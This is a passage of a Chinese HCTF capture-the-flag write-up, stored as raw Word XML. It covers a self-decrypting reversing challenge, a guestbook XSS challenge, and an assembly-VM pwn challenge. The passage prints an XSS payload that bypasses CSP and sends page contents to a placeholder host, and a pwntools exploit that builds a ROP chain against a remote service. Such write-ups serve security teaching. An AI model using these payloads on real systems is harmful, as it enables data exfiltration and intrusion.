        <w:t>其实程序算法不难</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>烦就烦在程序有五处对自身代码进行异或，变成5个函数，关键是嵌套的，先解密第一个函数后，发现里面有对第二个函数的解密</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>依次类推</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>好麻烦</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>每一个函数可获得flag的部分内容，好像知道杭电的大佬这道题是怎么出的，膜。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ab/>
        <w:t>首先在main函数里面，判断输入字符长度为26字节，最后一个字符为</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后对step1_xor_125这个地址即0x601540开始，总共713个字节，分别与}异或，step2即0x601060处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328505B5" wp14:editId="3438ADE5">
            <wp:extent cx="4400776" cy="110495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ab/>
        <w:t>得到的第一个解密函数如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D740C6B" wp14:editId="680D6A17">
            <wp:extent cx="5274310" cy="2907585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ab/>
        <w:t>首先与判断输入的前五个字符，分别与16、17、18、19、20异或，与check</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>数组比较，逆之得到hctf{，然后对0x601060地址开始的1246字节与0x6a异或，得到第二个解密函数，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65ABF30F" wp14:editId="10986636">
            <wp:extent cx="5274310" cy="3687076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ab/>
        <w:t>第二个解密函数是对输入的第6到第9这四个字符作check，首先将这四个字符分成低4位高4位扩展成8字节，然后用hctf作密钥，对这四个字符作RC4算法，得到的密文与check数组</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"\x5d\x09\x90\x90\x26\x2f\x01\x8a"</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进行比较，所以解之可得这四个字符为The_。函数的最后还对第三个和第四个解密函数做了异或操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4195DE57" wp14:editId="2D7F7657">
            <wp:extent cx="5274310" cy="2568784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ab/>
        <w:t>首先是对0x601540+214即0x601616开始的499个字节分别与The_这四个字符异或，得到第三个解密函数，并且又对0x601060开始的265个字节与(0x601060+981)即0x601435开始的265个字节相异或，得到第四个解密函数初步版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…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ab/>
        <w:t>第三个解密函数如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DEBAD11" wp14:editId="255B2744">
            <wp:extent cx="5274310" cy="3346501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ab/>
        <w:t>第三个解密函数是对flag的第10到第15个字符作check，用了变种的base64</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>编码，该变种base64编码字符范围为[48,111]，然后与check数组比较，解之得Basic_。最后又对第四个函数的初步版本与0x23进行异或，得到第四个解密函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在解密的时候这个函数最后一字节好像解密不对，改成ret指令即可f5。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34FE171F" wp14:editId="12C9DBAD">
            <wp:extent cx="5035809" cy="410231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41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ab/>
        <w:t>第四个函数是对flag的第16到第21个字符作check，将每个字符的低四位和高四位颠倒之后与0x11异或，再与check数组比较，解之得</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0f_RE_</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。最后对(0x601540+608)即0x6017a0处105个字节分别与这6个字符进行异或，得到第五个函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>同样最后一字节解密错误，改成retn指令即可终于，终于解完了</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OMG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ab/>
        <w:t>第五个函数如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64FD4666" wp14:editId="6382ACFD">
            <wp:extent cx="4343623" cy="158123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ab/>
        <w:t>这里就是判断flag的第22到第25这四个字符与0B8o比较，所以最终flag为：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hctf{The_Basic_0f_RE_0B8o}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附上解密的idapython脚本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455B" w:rsidRPr="00764553" w:rsidTr="004C7D6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr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from idaapi import *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from idc import *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step1_add = 0x601540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step2_add = 0x601060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#step1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#for i in range(713):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#    b = Byte(step1_add+i) ^ 125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#    PatchByte(step1_add+i, b)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#step2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#for i in range(1246):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#   b = Byte(step2_add+i) ^ 0x6a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#   PatchByte(step2_add+i, b)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'''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#step3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step3_add = step1_add + 214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for i in range(499):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 if i%4 ==0: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     b = Byte(step3_add+i) ^ ord('T')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     PatchByte(step3_add+i, b)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 elif i%4 ==1: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     b = Byte(step3_add+i) ^ ord('h')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     PatchByte(step3_add+i, b)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 elif i%4 ==2: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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        b = Byte(step3_add+i) ^ ord('e')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     PatchByte(step3_add+i, b)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 elif i%4 ==3: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     b = Byte(step3_add+i) ^ ord('_')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     PatchByte(step3_add+i, b)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'''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'''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#step4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for i in range(265):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b = Byte(step2_add+i) ^ Byte(step2_add+i+981)^0x23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PatchByte(step2_add+i, b)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'''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#step5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step3_add = step1_add + 608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>for i in range(105):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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    if i%6 ==0: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     b = Byte(step3_add+i) ^ ord('0')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     PatchByte(step3_add+i, b)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 elif i%6 ==1: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     b = Byte(step3_add+i) ^ ord('f')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     PatchByte(step3_add+i, b)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 elif i%6 ==2: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     b = Byte(step3_add+i) ^ ord('_')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     PatchByte(step3_add+i, b)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 elif i%6 ==3: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     b = Byte(step3_add+i) ^ ord('R')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     PatchByte(step3_add+i, b)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 elif i%6 ==4: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     b = Byte(step3_add+i) ^ ord('E')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     PatchByte(step3_add+i, b)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 elif i%6 ==5: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t xml:space="preserve">        b = Byte(step3_add+i) ^ ord('_')</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
            <w:pPr>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00764553">
              <w:rPr>
                <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        PatchByte(step3_add+i, b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc468128538"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>guestbook</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>just a guestbook url</w:t>
      </w:r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  <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://guestbook.hctf.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00764553" w:rsidRDefault="00764553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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>该网站实现的功能是类似于留言板的功能，管理员会在后台访问。并且，网站有csp保护。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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞：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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. 未过滤尖括号等，黑名单方式，只过滤了危险字符，未递归删除；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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. `script-src`中有`unsafe-inline`，可内联执行js。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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   可采取dns预读取的方式来绕过限制，flag未在cookie中，而在其源码里。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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   payload：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```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&lt;scrscriptipt&gt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lastRenderedPageBreak/>
        <w:t>var test = document.createElement("lilinknk")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test.setAttribute("rel", "prefetch")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test.setAttribute("href", "//xx.xx.xx.xx/?" + btoa(escape(document.body.innerHTML)))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document.head.appendChild(test)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&lt;/scrscriptipt&gt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```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flag:hctf{c5p_1s_g0od7h1ng2333}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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc468128539"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>asm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>汇编入门测试 115.28.78.54 23333</w:t>
      </w:r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hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/asm/asm.tar</w:t>
        </w:r>
      </w:hyperlink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本题给了三个文件he</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>llo.asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，make</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_code</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（64位可执行程序），pwn（32位可执行程序）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ello</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是一段示例asm代码，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>make_code</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>程序可以对输入的asm程序编译，pwn则负责解析执行编译出的程序。来看一下pwn的程序逻辑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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4485BCF3" wp14:editId="59AEA146">
            <wp:extent cx="5274310" cy="6864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lastRenderedPageBreak/>
        <w:t>这里我们主要关注程序在解析执行时的处理逻辑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1、首先检查vpc是否在合法范围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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B6DE2F5" wp14:editId="61A89363">
            <wp:extent cx="5274310" cy="11893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2、提取指令操作码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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2B3A9F" wp14:editId="6474B0B0">
            <wp:extent cx="5274310" cy="37598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在push和pop操作中出现了逻辑漏洞。通常情况下，linux程序的内存map如下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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BAB425A" wp14:editId="241D5E8C">
            <wp:extent cx="5274310" cy="32924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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>那么，对于push操作，vs</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以很大，比如vsp指向了宿主程序的栈区，这个时候就可以通过push操作在栈上构造rop链；类似的，对于pop操作，vsp的值可以很小，这里我们让它指向bss段，比如GOT表，这样就可以获取到libc的地址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现在，通过push和pop我们已经可以做到泄露libc地址和往任意内存（地址大于heap段）写入数据，但现在还确定地址函数返回地址在栈上的地址，我们可以来看一下处理系统调用的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C0F169" wp14:editId="25FA06BD">
            <wp:extent cx="4361905" cy="1866667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lastRenderedPageBreak/>
        <w:t>这里只让我们调用put</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>函数，不过，在调用puts函数之前，esp地址（stack地址）被存储到了bss段中，因此，通过调用一次ca</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ll puts</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>操作，就可以将栈上的某一个地址写入到bss段中。脚本如下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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from pwn import *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debug = 0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log = 1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if log: context.log_level = True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if debug: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ab/>
        <w:t>asm_code = """data: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0x23206873,0x726f776f,0x646c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end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push data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call puts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lea r0,r2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mov r1,pc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sub r2,r1,r0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sub sp,sp,r2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add sp,sp,0x27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pop r0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sub sp,sp,0x24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pop r1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pop r2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add r0,r0,0x80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mov sp,r0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push data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push 0x0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add r1,r1,0x22350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push r1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push 0x0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add r2,r2,0x3d4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push r2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$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ab/>
        <w:t>"""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else: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ab/>
        <w:t>asm_code = """data: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0x23206873,0x726f776f,0x646c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end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push data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call puts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lastRenderedPageBreak/>
        <w:t>lea r0,r2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mov r1,pc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sub r2,r1,r0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sub sp,sp,r2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add sp,sp,0x27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pop r0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sub sp,sp,0x24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pop r1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pop r2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add r0,r0,0x80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mov sp,r0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push data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push 0x0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add r1,r1,0x22400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push r1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push 0x0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add r2,r2,0x3d4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push r2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$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ab/>
        <w:t>"""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pm = process('./make_code')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pm.recvline()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pm.sendline(asm_code)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binary = pm.recv(1000)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if debug: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ab/>
        <w:t>p = process('./pwn')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else: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ab/>
        <w:t>p = remote('115.28.78.54', 23333)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ab/>
        <w:t>p.sendline('b66888c818c08d932ea91b8d6a1f122c2y7ZAdbh')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if debug: gdb.attach(p, open('debug'))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p.recvuntil('bin')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p.sendline(binary)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00E14965" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc468128540"/>
      <w:r w:rsidRPr="00764553">
        <w:lastRenderedPageBreak/>
        <w:t>==========</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:t>==========</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc468128541"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">13 </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>大图书馆的牧羊人</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
